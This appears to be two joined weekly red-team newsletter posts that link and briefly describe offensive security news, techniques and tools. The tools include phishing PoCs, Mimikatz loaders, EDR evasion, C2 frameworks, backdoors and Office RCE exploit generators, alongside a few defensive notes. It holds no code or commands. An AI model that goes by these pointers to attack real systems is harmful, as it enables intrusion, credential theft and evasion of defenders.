• Microsoft365_devicePhish is a a proof-of-concept script to conduct a phishing attack abusing Microsoft 365 OAuth Authorization Flow. Compare to 365-Stealer and TokenTactics.
• Mimikore is a .NET 5 single file application loader for Mimikatz or any Base64 PE.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Illinois Bought Invasive Phone Location Data From Banned Broker Safegraph. I've read my cell phone and internet provider terms of service, but the issue is all the major providers have the same clauses where they can sell your data. There's no alternative that provides the same level of service while respecting customer data. I worry that since this data is "anonomyized" even measures like GDPR wouldn't be effective.
• How Data Brokers Sell Access to the Backbone of the Internet. More privacy nightmare fuel. Every connection to and from public IP addresses is being recorded, sold, aggregated, and analyzed. There are now full on private SIGINT systems.
• Hackers Leak Videos of Iranian Prison. This looks like a classic hacker movie scene - the screens go black then display the hacker's message full screen.
• Update on the vulnerability in the Azure Cosmos DB Jupyter Notebook Feature. "On August 12, 2021, a security researcher reported a vulnerability in the Azure Cosmos DB Jupyter Notebook feature that could potentially allow a user to gain access to another customer’s resources by using the account’s primary read-write key." Luckily it only affected customers with the Jupyter Notebook feature enabled. For more information check out ChaosDB.
• From Pearl to Pegasus Bahraini Government Hacks Activists with NSO Group Zero-Click iPhone Exploits. More 0-click iOS exploit nightmare fuel.
• SolarWinds and the Holiday Bear Campaign: A Case Study for the Classroom. This detailed-but-accessible case study of the Russian cyber espionage campaign that targeted SolarWinds is from the free Cybersecurity Law, Policy, and Institutions (version 3.1).
• ProtonMail deletes 'we don't log your IP' boast from website after French climate activist reportedly arrested. Assume your IP is being recorded by not only the site you access, but every device/government/data broker in between. Act accordingly if any of those are in your threat model.

Techniques

• Operational Mental Models. After releasing the EDR Sensor Evasion Flowchart, @Jackson_T is back with another meta-assessment post about the frameworks and models for offensive research and development.
• ZDI-21-1053: Bypassing Windows Lock Screen. The ease of access on screen reader is used once again to execute binaries on a USB and execute code even with the screen of a Windows 10 computer locked. PoC video here.
• From RpcView to PetitPotam. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.
• Introducing Process Hiving & RunPE. "This blog introduces innovative techniques and is a must have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime, including capturing any output, before cleaning up and restoring memory to hide any trace that it was run." A solid PE runner is a must-have in ever red team toolkit. Code here.
• %appdata% is a mistake – Introducing Invoke-DLLClone. DLL hijacking isn't new but darn if it isn't effective still. The new Invoke-DLLClone is worth a look!
• Obsidian, Taming a Collective Consciousness. Red team knowledge management is a topic I am all too familiar with (imagine the data that powers this blog...). This post shows a "flat" markdown note based approach that uses Obsidian.
• Widespread credential phishing campaign abuses open redirector links. Most commercial email providers scan links for reputation and can prevent phishing links from being opened. Attackers are now using open redirects on "trusted" sites to bypass these protections and deliver their payloads/load their pages. These are also combined with reCAPTCHA protections to prevent automated scanning.
• Backdoor Office 365 and Active Directory - Golden SAML. This quick post shows the 8 steps to generate a golden SAML token as well as some detections.
• Blinding EDR On Windows. This is a great post that brings together a lot of information about AV/EDR as well as kernel drivers, driver signing, and how to use kernel drivers against EDRs.

Tools and Exploits

• Quick Tunnels: Anytime, Anywhere. Cloudflare tunnels are available without an account. They use 4x HTTPS connections to Cloudflare IPs to tunnel traffic to anything the cloudflared binary can reach. Consider this a more trusted version of ngrok. "Unless you delete them, Tunnels can live for months." Defenders, look for update.argotunnel.com, h2.cftunnel.com, and trycloudflare.com based on my testing.
• RCE-0-day-for-GhostScript-9.50. This 0-day exploit affects the ImageMagick with the default settings from Ubuntu repository (tested with default settings of ImageMagick on Ubuntu 20.04). More info here.
• LiquidSnake is a program aimed at performing lateral movement against Windows systems without touching the disk. The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.
• NSGenCS is an extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. More information at The Birth of NSGenCS.
• AWS ReadOnlyAccess: Not Even Once. ReadOnlyAccess sounds secure, but it can cause a false sense of security and is usually too broad for whatever is actually needed.
• OpenBMC: remote code execution in netipmid. IPMI is a very powerful interface with tons of bugs. Add this RCE to your next internal assessment bag of tricks.
• iHide is a utility for hiding jailbreaks from iOS applications. This can be a huge help when doing security assessments on applications with pesky jailbreak detection. See the blog post for more info.
• PR0CESS has a few projects for interesting PE loading techniques.
• CVE-2021-33909 is a Linux LPE for Sequoia.
• laurel is a tool to transform Linux Audit logs into JSON for SIEM usage.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• packetsifterTool is a tool/script that is designed to aid analysts in sifting through a packet capture (pcap) to find noteworthy traffic. Packetsifter accepts a pcap as an argument and outputs several files.
• zuthaka is a collaborative free open-source Command & Control integration framework that allows developers to concentrate on the core function and goal of their C2.
• JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a "magic" ICMP packet instructing the backdoor to either callback or listen.
• beacon_health_check is an aggressor script that uses a beacon's note field to indicate the health status of a beacon.
• Khepri is a post-exploiton tool written in Golang and C++, with architecture and usage like Cobalt Strike. So much like Cobalt Strike that a casual look at the screenshot could confuse the two!
• ockam is a library for end-to-end encryption and mutual authentication for distributed applications.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• Introducing Android’s Private Compute Services. Google is aiming to put the Private Compute Core from Android in the cloud and they're vouching to do 3rd party validation via audits.
• VMware denies allegations it leaked Confluence RCE exploit. Bug bounty drama as a payload sent to VMware as part of a bounty was later added to the Nuclei scanner by a researcher who claimed they found it via "Pastebin scraping" and could not produce the source URL to the paste. Bug bounties rely on trust, and these types of incidents underscore that.
• FORCEDENTRY NSO Group iMessage Zero-Click Exploit Captured in the Wild. If your threat model includes nation states with massive war chests willing to burn 0days to get on your device, I think any stock OS is going to be insufficient to protect you. Perhaps the best way to fight against this type of exploitation is to capture and expose the exploits fast enough to make it economically unfeasible to use them against activists? Props to Citizen Lab for doing the work here.
• U.S. Company Sold Zero-Click Hacking Tool to UAE Spy Operation. Three members of the RAVEN crew pled guilty in exchange for a three-year deferred prosecution agreement and fines. Interesting that the CFAA wasn't used in this case, as it is typically the hammer for anything computer related. How much taxpayer money did the US spend investigating and prosecuting these three? Imagine if the US Government instead paid competitive salaries so their own hackers didn't travel to the Middle East and hack for other governments...
• Between the 3 Sept and 10 Sept, secure env vars of *all* public @travisci repositories were injected into PR builds.. Self host that CI/CD, that way the mistakes are your own.

Techniques

• Burp Suite RCE. The built-in Chrome browser in Burp Suite 2.0 is an old Chrome version, which can be combined with the "Use dynamic analysis techniques" feature to trigger RCE on an assessors Windows machine by simply browsing a site via the embedded Chrome browser. Is this ultimate WAF? Ransomware any Burp Suite users that browse your site?
• Hacking CloudKit - How I accidentally deleted your Apple Shortcuts. Even the big companies are not immune to misconfigured access controls. In this case the result was an assessor was able to delete all shared "shortcuts" links for iOS.
• Tickling VMProtect with LLVM: Part 1. This series gets into the weeds of using LLVM as a software based deobfuscation framework that initially targets binaries protected with VMProtect.
• Analysis of a Parallels Desktop Stack Clash Vulnerability and Variant Hunting using Binary Ninja. Supporting macOS back to 10.13 had the effect of silently dripping stack protections, and the author uses the Binary Ninja Python API to help automate bug finding.
• Change home directory and bypass TCC aka CVE-2020-27937. By planting your own TCC database you can bypass the whole user TCC (Desktop, Documents, Address Book, Camera, Microphone, Photos and more).
• Hook Heaps and Live Free. Ecnrypted heap allocations. Now that is some legit tradecraft! This post is a gold mine of information about "in memory evasion" and practical examples of how to implement it with Cobalt Strike. Example code (for the first basic example) here. If you liked this post be sure to check out SleepyCrypt: Encrypting a running PE image while it sleeps which also dropped last week.
• CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices. Perhaps its time to download any gaming related drivers and do a vulnerability hunt... 🤔

Tools and Exploits

• Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444. This was the big news of last week. RCE from simply opening a Word doc, thanks to old friends - directory traversal, IE, and ActiveX.

  • Demo of an RTF variant working in the explorer preview
  • KQL query
  • Malicious docx generator
  • Windows MSHTML zero-day defenses bypassed as new info emerges
  • CVE-2021-40444 Analysis/Exploit - This is the best analysis/walkthrough I have come across.
  • Microsoft Defender Attack Surface Reduction recommendations - Old but gold. "Block all Office applications from creating child processes" is what you want for this vulnerability specifically.

• BOF-Adios is a BOF that will zero, then delete your beacon's executable on exit! Useful if you are dropping a loader to disk as part of a phishing campaign.
• NimHollow is a Nim implementation of Process Hollowing using syscalls with some nice features like shellcode encryption, sandbox detection, and AMSI patching.
• iam-vulnerable - Use Terraform to create your own vulnerable by design AWS IAM privilege escalation playground. More details on the BishopFox blog.
• Toggle_Token_Privileges_BOF is an (almost) syscall-only BOF file intended to either add or remove token privileges within the context of your current process.
• SharpSystemTriggers is a collection of remote authentication triggers coded in C# using MIDL compiler for avoiding 3rd party dependencies.
• azureOutlookC2 - Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP: Use Microsoft Graph API for C2 Operations.
• ImpulsiveDLLHijack is a C# tool which automates the process of discovering and exploiting DLL Hijacks in target binaries. The Hijacked paths discovered can later be weaponized during Red Team Operations to evade EDR's.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• wwwgrep is a rapid search “grepping” mechanism that examines HTML elements by type and permits focused (single), multiple (file based URLs) and recursive (with respect to root domain or not) searches to be performed.
• AppInitHook is a global user-mode hooking framework, based on AppInit_DLLs. The goal is to allow you to rapidly develop hooks to inject in an arbitrary process. Developed to reverse engineer and customize random applications, it has broad implications for read teaming.
• ElusiveMice is a Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.